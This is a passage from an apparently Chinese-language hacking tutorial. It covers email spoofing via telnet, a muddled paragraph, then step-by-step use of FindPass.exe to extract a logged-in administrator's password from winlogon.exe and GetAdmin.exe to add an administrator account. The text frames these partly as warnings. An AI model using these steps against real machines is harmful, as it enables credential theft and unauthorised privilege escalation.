使用telnet一个黑客可以截取任何一个身份证发送E-mail的全部信息，这样的Email消息是真的，因为它发自于一个合法的用户。在这种情形下这些信息显得是绝对的真实。黑客可以伪造这些。一个冒充系统管理员或经理的黑客就能较为轻松的获得大量的信息，黑客就能实施他们的恶意阴谋。
二、物理攻击之获取管理员密码
物理安全是保护一些比较重要的设备不被接触。物理安全比较难防，因为攻击者往往是来自能够接触到物理设备的用户。下面一案例来说明如何获得用户的管理员帐号。
如果你的电脑经常被别人接触，别人就有可能利用一些工具软件来获得你的管理员帐号，这样一来下次他就可以成功的登录你的计算机了。
一般来说我们自己使用的计算机的时候我们都是采用管理员登录的，而管理员帐号在登录后，所有的用户信息都存储在系统的一个进程中，这个进程是：“winlogon.exe”，物理攻击者就可以利用程序将当前登录用户的密码解码出来。
在这种情况下，如果你的计算机给别人使用的话，你虽然不安告诉别人你的计算机密码是多少，别人仍然可以使用软件解码出你的管理员的帐号和密码。比如说使用 FindPass.exe如果是Windows Server 2003环境的话，还可以使用FindPass2003.exe等工具就可以对该进程进行解码，然后将当前用户的密码显示出来。具体使用的方法就是将FindPass.exe或者FindPass2003.exe拷贝到C盘根目录，在cmd下执行该程序，就可以获得当前用户得登录名。
所以在此告诫大家如果你的计算机中有非常重要的信息的话也不要轻易给别人使用，这也是很危险的。
三、物理攻击之提升用户权限
有时候，管理员为了安全，给其他用户建立一个普通用户帐号，认为这样就安全了。其实不然，用普通用户帐号登录后，可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。例如利用Hacker帐户登录系统，在系统中执行程序GetAdmin.exe，这样一来程序就会自动读取所有用户列表，在对话框中点击按钮“New”，在框中输入要新建的管理员组的用户名。
输入一个用户名“IAMHacker”，点击按钮“确定”以后，然后点击主窗口的按钮“OK”，出现添加成功的窗口。